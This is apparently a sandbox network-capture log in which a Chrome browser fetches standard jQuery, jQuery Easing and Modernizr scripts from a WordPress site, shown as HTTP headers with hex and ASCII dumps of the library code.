                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:02 GMT
                                                            ETag: "2bd8-620a930e6d13a"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 11224
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:58 UTC7906INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 33 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                            Data Ascii: /*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                            2025-01-15 10:07:58 UTC3318INData Raw: 53 74 61 74 65 26 26 75 28 22 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 6c 6f 61 64 27 2e 2e 2e 29 20 63 61 6c 6c 65 64 20 61 66 74 65 72 20 6c 6f 61 64 20 65 76 65 6e 74 20 6f 63 63 75 72 72 65 64 22 29 2c 48 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 73 2e 65 61 63 68 28 5b 22 6c 6f 61 64 22 2c 22 75 6e 6c 6f 61 64 22 2c 22 65 72 72 6f 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 73 2e 66 6e 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 29 3b 72 65 74 75 72 6e 22 6c 6f 61 64 22 3d 3d 3d 74 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 5b 30 5d 3f 52 2e 61 70
                                                            Data Ascii: State&&u("jQuery(window).on('load'...) called after load event occurred"),H.apply(this,arguments)},s.each(["load","unload","error"],function(e,t){s.fn[t]=function(){var e=Array.prototype.slice.call(arguments,0);return"load"===t&&"string"==typeof e[0]?R.ap


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.1649735178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC418OUTGET /wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:38:26 GMT
                                                            ETag: "1f9c-620a8ae0ccb1e"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 8092
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:58 UTC7907INData Raw: 2f 2a 0a 20 2a 20 6a 51 75 65 72 79 20 45 61 73 69 6e 67 20 76 31 2e 33 20 2d 20 68 74 74 70 3a 2f 2f 67 73 67 64 2e 63 6f 2e 75 6b 2f 73 61 6e 64 62 6f 78 2f 6a 71 75 65 72 79 2f 65 61 73 69 6e 67 2f 0a 20 2a 0a 20 2a 20 55 73 65 73 20 74 68 65 20 62 75 69 6c 74 20 69 6e 20 65 61 73 69 6e 67 20 63 61 70 61 62 69 6c 69 74 69 65 73 20 61 64 64 65 64 20 49 6e 20 6a 51 75 65 72 79 20 31 2e 31 0a 20 2a 20 74 6f 20 6f 66 66 65 72 20 6d 75 6c 74 69 70 6c 65 20 65 61 73 69 6e 67 20 6f 70 74 69 6f 6e 73 0a 20 2a 0a 20 2a 20 54 45 52 4d 53 20 4f 46 20 55 53 45 20 2d 20 6a 51 75 65 72 79 20 45 61 73 69 6e 67 0a 20 2a 20 0a 20 2a 20 4f 70 65 6e 20 73 6f 75 72 63 65 20 75 6e 64 65 72 20 74 68 65 20 42 53 44 20 4c 69 63 65 6e 73 65 2e 20 0a 20 2a 20 0a 20 2a 20 43 6f
                                                            Data Ascii: /* * jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/ * * Uses the built in easing capabilities added In jQuery 1.1 * to offer multiple easing options * * TERMS OF USE - jQuery Easing * * Open source under the BSD License. * * Co
                                                            2025-01-15 10:07:58 UTC185INData Raw: 43 4f 4e 54 52 41 43 54 2c 20 53 54 52 49 43 54 20 4c 49 41 42 49 4c 49 54 59 2c 20 4f 52 20 54 4f 52 54 20 28 49 4e 43 4c 55 44 49 4e 47 0a 20 2a 20 20 4e 45 47 4c 49 47 45 4e 43 45 20 4f 52 20 4f 54 48 45 52 57 49 53 45 29 20 41 52 49 53 49 4e 47 20 49 4e 20 41 4e 59 20 57 41 59 20 4f 55 54 20 4f 46 20 54 48 45 20 55 53 45 20 4f 46 20 54 48 49 53 20 53 4f 46 54 57 41 52 45 2c 20 45 56 45 4e 20 49 46 20 41 44 56 49 53 45 44 20 0a 20 2a 20 4f 46 20 54 48 45 20 50 4f 53 53 49 42 49 4c 49 54 59 20 4f 46 20 53 55 43 48 20 44 41 4d 41 47 45 2e 20 0a 20
                                                            Data Ascii: CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE.


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.1649737178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC410OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC287INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:01 GMT
                                                            ETag: "15db1-620a930e1dfa1"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 89521
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:58 UTC7905INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 74 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 74 29 26 26 65 2e 74 79 70 65 3d 3d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 74 7c 7c 65 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 74 26 26 61 65 28
                                                            Data Ascii: owerCase();return("input"===t||"button"===t)&&e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisabled===t||e.isDisabled!==!t&&ae(
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 2c 73 2c 75 2c 6c 3d 79 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 79 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69
                                                            Data Ascii: ,s,u,l=y!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(y){while(l){a=e;while(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.fi
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 69 65 64 3f 72 2e 76 61 6c 75 65 3a 6e 75 6c 6c 7d 29 2c 73 65 7d 28 43 29 3b 53 2e 66 69 6e 64 3d 64 2c 53 2e 65 78 70 72 3d 64 2e 73 65 6c 65 63 74 6f 72 73 2c 53 2e 65 78 70 72 5b 22 3a 22 5d 3d 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 53 2e 75 6e 69 71 75 65 53 6f 72 74 3d 53 2e 75 6e 69 71 75 65 3d 64 2e 75 6e 69 71 75 65 53 6f 72 74 2c 53 2e 74 65 78 74 3d 64 2e 67 65 74 54 65 78 74 2c 53 2e 69 73 58 4d 4c 44 6f 63 3d 64 2e 69 73 58 4d 4c 2c 53 2e 63 6f 6e 74 61 69 6e 73 3d 64 2e 63 6f 6e 74 61 69 6e 73 2c 53 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 3d 64 2e 65 73 63 61 70 65 3b 76 61 72 20 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 5b 5d 2c 69 3d 76 6f 69 64 20 30 21 3d 3d 6e 3b 77 68 69 6c 65 28 28 65 3d 65 5b
                                                            Data Ascii: ied?r.value:null}),se}(C);S.find=d,S.expr=d.selectors,S.expr[":"]=S.expr.pseudos,S.uniqueSort=S.unique=d.uniqueSort,S.text=d.getText,S.isXMLDoc=d.isXML,S.contains=d.contains,S.escapeSelector=d.escape;var h=function(e,t,n){var r=[],i=void 0!==n;while((e=e[
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 22 2c 42 29 2c 53 2e 72 65 61 64 79 28 29 7d 53 2e 66 6e 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 46 2e 74 68 65 6e 28 65 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 72 65 61 64 79 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 29 2c 74 68 69 73 7d 2c 53 2e 65 78 74 65 6e 64 28 7b 69 73 52 65 61 64 79 3a 21 31 2c 72 65 61 64 79 57 61 69 74 3a 31 2c 72 65 61 64 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 21 30 3d 3d 3d 65 3f 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 3a 53 2e 69 73 52 65 61 64 79 29 7c 7c 28 53 2e 69 73 52 65 61 64 79 3d 21 30 29 21 3d 3d 65 26 26 30 3c 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 7c 7c 46 2e 72 65 73 6f 6c 76 65 57 69 74 68 28 45 2c 5b 53 5d 29 7d 7d 29 2c 53 2e 72 65 61
                                                            Data Ascii: ",B),S.ready()}S.fn.ready=function(e){return F.then(e)["catch"](function(e){S.readyException(e)}),this},S.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--S.readyWait:S.isReady)||(S.isReady=!0)!==e&&0<--S.readyWait||F.resolveWith(E,[S])}}),S.rea
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 73 2c 6e 2c 72 2c 74 5b 73 5d 2c 6f 29 3b 72 65 74 75 72 6e 20 65 7d 69 66 28 6e 75 6c 6c 3d 3d 72 26 26 6e 75 6c 6c 3d 3d 69 3f 28 69 3d 6e 2c 72 3d 6e 3d 76 6f 69 64 20 30 29 3a 6e 75 6c 6c 3d 3d 69 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 28 69 3d 72 2c 72 3d 76 6f 69 64 20 30 29 3a 28 69 3d 72 2c 72 3d 6e 2c 6e 3d 76 6f 69 64 20 30 29 29 2c 21 31 3d 3d 3d 69 29 69 3d 54 65 3b 65 6c 73 65 20 69 66 28 21 69 29 72 65 74 75 72 6e 20 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 6f 26 26 28 61 3d 69 2c 28 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 28 29 2e 6f 66 66 28 65 29 2c 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 67 75 69 64 3d 61 2e 67 75 69 64 7c 7c 28 61 2e 67 75 69 64 3d
                                                            Data Ascii: s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=Te;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return S().off(e),a.apply(this,arguments)}).guid=a.guid||(a.guid=
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 6e 28 65 29 7b 76 61 72 20 74 3d 6e 2e 65 71 28 65 29 3b 68 26 26 28 72 5b 30 5d 3d 64 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 2e 68 74 6d 6c 28 29 29 29 2c 48 65 28 74 2c 72 2c 69 2c 6f 29 7d 29 3b 69 66 28 66 26 26 28 74 3d 28 65 3d 78 65 28 72 2c 6e 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 21 31 2c 6e 2c 6f 29 29 2e 66 69 72 73 74 43 68 69 6c 64 2c 31 3d 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 74 29 2c 74 7c 7c 6f 29 29 7b 66 6f 72 28 73 3d 28 61 3d 53 2e 6d 61 70 28 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 2c 44 65 29 29 2e 6c 65 6e 67 74 68 3b 63 3c 66 3b 63 2b 2b 29 75 3d 65 2c 63 21 3d 3d 70 26 26 28 75 3d 53 2e 63 6c 6f 6e 65 28 75 2c 21 30 2c 21 30 29 2c 73 26 26 53 2e 6d 65 72 67 65 28 61 2c
                                                            Data Ascii: n(e){var t=n.eq(e);h&&(r[0]=d.call(this,e,t.html())),He(t,r,i,o)});if(f&&(t=(e=xe(r,n[0].ownerDocument,!1,n,o)).firstChild,1===e.childNodes.length&&(e=t),t||o)){for(s=(a=S.map(ve(e,"script"),De)).length;c<f;c++)u=e,c!==p&&(u=S.clone(u,!0,!0),s&&S.merge(a,
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 6e 7c 7c 30 21 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 22 62 61 63 6b 67 72 6f 75 6e 64 22 29 7c 7c 28 6c 5b 74 5d 3d 22 69 6e 68 65 72 69 74 22 29 2c 61 26 26 22 73 65 74 22 69 6e 20 61 26 26 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 61 2e 73 65 74 28 65 2c 6e 2c 72 29 29 7c 7c 28 75 3f 6c 2e 73 65 74 50 72 6f 70 65 72 74 79 28 74 2c 6e 29 3a 6c 5b 74 5d 3d 6e 29 29 7d 7d 2c 63 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 2c 61 2c 73 3d 58 28 74 29 3b 72 65 74 75 72 6e 20 58 65 2e 74 65 73 74 28 74 29 7c 7c 28 74 3d 7a 65 28 73 29 29 2c 28 61 3d 53 2e 63 73 73 48 6f 6f 6b 73 5b 74 5d 7c 7c 53 2e 63 73 73 48 6f 6f 6b 73 5b 73 5d 29 26 26 22 67 65 74 22 69 6e 20 61 26 26 28 69 3d 61 2e 67 65 74 28 65 2c 21 30 2c 6e 29 29 2c 76
                                                            Data Ascii: n||0!==t.indexOf("background")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.setProperty(t,n):l[t]=n))}},css:function(e,t,n,r){var i,o,a,s=X(t);return Xe.test(t)||(t=ze(s)),(a=S.cssHooks[t]||S.cssHooks[s])&&"get"in a&&(i=a.get(e,!0,n)),v
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 68 69 73 29 2c 6e 3d 74 5b 61 2b 22 71 75 65 75 65 22 5d 2c 72 3d 74 5b 61 2b 22 71 75 65 75 65 48 6f 6f 6b 73 22 5d 2c 69 3d 53 2e 74 69 6d 65 72 73 2c 6f 3d 6e 3f 6e 2e 6c 65 6e 67 74 68 3a 30 3b 66 6f 72 28 74 2e 66 69 6e 69 73 68 3d 21 30 2c 53 2e 71 75 65 75 65 28 74 68 69 73 2c 61 2c 5b 5d 29 2c 72 26 26 72 2e 73 74 6f 70 26 26 72 2e 73 74 6f 70 2e 63 61 6c 6c 28 74 68 69 73 2c 21 30 29 2c 65 3d 69 2e 6c 65 6e 67 74 68 3b 65 2d 2d 3b 29 69 5b 65 5d 2e 65 6c 65 6d 3d 3d 3d 74 68 69 73 26 26 69 5b 65 5d 2e 71 75 65 75 65 3d 3d 3d 61 26 26 28 69 5b 65 5d 2e 61 6e 69 6d 2e 73 74 6f 70 28 21 30 29 2c 69 2e 73 70 6c 69 63 65 28 65 2c 31 29 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6f 3b 65 2b 2b 29 6e 5b 65 5d 26 26 6e 5b 65 5d 2e 66 69 6e 69 73 68 26 26 6e 5b
                                                            Data Ascii: his),n=t[a+"queue"],r=t[a+"queueHooks"],i=S.timers,o=n?n.length:0;for(t.finish=!0,S.queue(this,a,[]),r&&r.stop&&r.stop.call(this,!0),e=i.length;e--;)i[e].elem===this&&i[e].queue===a&&(i[e].anim.stop(!0),i.splice(e,1));for(e=0;e<o;e++)n[e]&&n[e].finish&&n[
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 78 74 29 2c 6e 5b 64 5d 28 29 2c 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 78 74 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64 3d 76 6f 69 64 20 30 2c 61 26 26 28 6e 5b 75 5d 3d 61 29 29 2c 65 2e 72 65 73 75 6c 74 7d 7d 2c 73 69 6d 75 6c 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 53 2e 65 78 74 65 6e 64 28 6e 65 77 20 53 2e 45 76 65 6e 74 2c 6e 2c 7b 74 79 70 65 3a 65 2c 69 73 53 69 6d 75 6c 61 74 65 64 3a 21 30 7d 29 3b 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 28 72 2c 6e 75 6c 6c 2c 74 29 7d 7d 29 2c 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 74 72 69 67 67 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74
                                                            Data Ascii: xt),n[d](),e.isPropagationStopped()&&f.removeEventListener(d,xt),S.event.triggered=void 0,a&&(n[u]=a)),e.result}},simulate:function(e,t,n){var r=S.extend(new S.Event,n,{type:e,isSimulated:!0});S.event.trigger(r,null,t)}}),S.fn.extend({trigger:function(e,t


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.1649738178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:07:58 UTC416OUTGET /wp-content/themes/salient/js/modernizr.js?ver=2.6.2 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:07:58 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:07:58 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:55:04 GMT
                                                            ETag: "434e-620a8e9809222"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 17230
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:07:58 UTC7906INData Raw: 2f 2a 20 4d 6f 64 65 72 6e 69 7a 72 20 32 2e 38 2e 33 20 28 43 75 73 74 6f 6d 20 42 75 69 6c 64 29 20 7c 20 4d 49 54 20 26 20 42 53 44 0a 20 2a 20 42 75 69 6c 64 3a 20 68 74 74 70 3a 2f 2f 6d 6f 64 65 72 6e 69 7a 72 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 23 2d 66 6f 6e 74 66 61 63 65 2d 62 61 63 6b 67 72 6f 75 6e 64 73 69 7a 65 2d 62 6f 72 64 65 72 69 6d 61 67 65 2d 62 6f 72 64 65 72 72 61 64 69 75 73 2d 62 6f 78 73 68 61 64 6f 77 2d 66 6c 65 78 62 6f 78 2d 66 6c 65 78 62 6f 78 6c 65 67 61 63 79 2d 68 73 6c 61 2d 6d 75 6c 74 69 70 6c 65 62 67 73 2d 6f 70 61 63 69 74 79 2d 72 67 62 61 2d 74 65 78 74 73 68 61 64 6f 77 2d 63 73 73 61 6e 69 6d 61 74 69 6f 6e 73 2d 63 73 73 63 6f 6c 75 6d 6e 73 2d 67 65 6e 65 72 61 74 65 64 63 6f 6e 74 65 6e 74 2d 63 73 73
                                                            Data Ascii: /* Modernizr 2.8.3 (Custom Build) | MIT & BSD * Build: http://modernizr.com/download/#-fontface-backgroundsize-borderimage-borderradius-boxshadow-flexbox-flexboxlegacy-hsla-multiplebgs-opacity-rgba-textshadow-cssanimations-csscolumns-generatedcontent-css
                                                            2025-01-15 10:07:58 UTC8000INData Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 61 2e 57 6f 72 6b 65 72 7d 2c 73 2e 61 70 70 6c 69 63 61 74 69 6f 6e 63 61 63 68 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 61 2e 61 70 70 6c 69 63 61 74 69 6f 6e 43 61 63 68 65 7d 2c 73 2e 73 76 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 26 26 21 21 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 72 2e 73 76 67 2c 22 73 76 67 22 29 2e 63 72 65 61 74 65 53 56 47 52 65 63 74 7d 2c 73 2e 69 6e 6c 69 6e 65 73 76 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 65 74 75 72 6e 20 61 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 73 76 67 2f 3e 22 2c 28
                                                            Data Ascii: ion(){return!!a.Worker},s.applicationcache=function(){return!!a.applicationCache},s.svg=function(){return!!b.createElementNS&&!!b.createElementNS(r.svg,"svg").createSVGRect},s.inlinesvg=function(){var a=b.createElement("div");return a.innerHTML="<svg/>",(
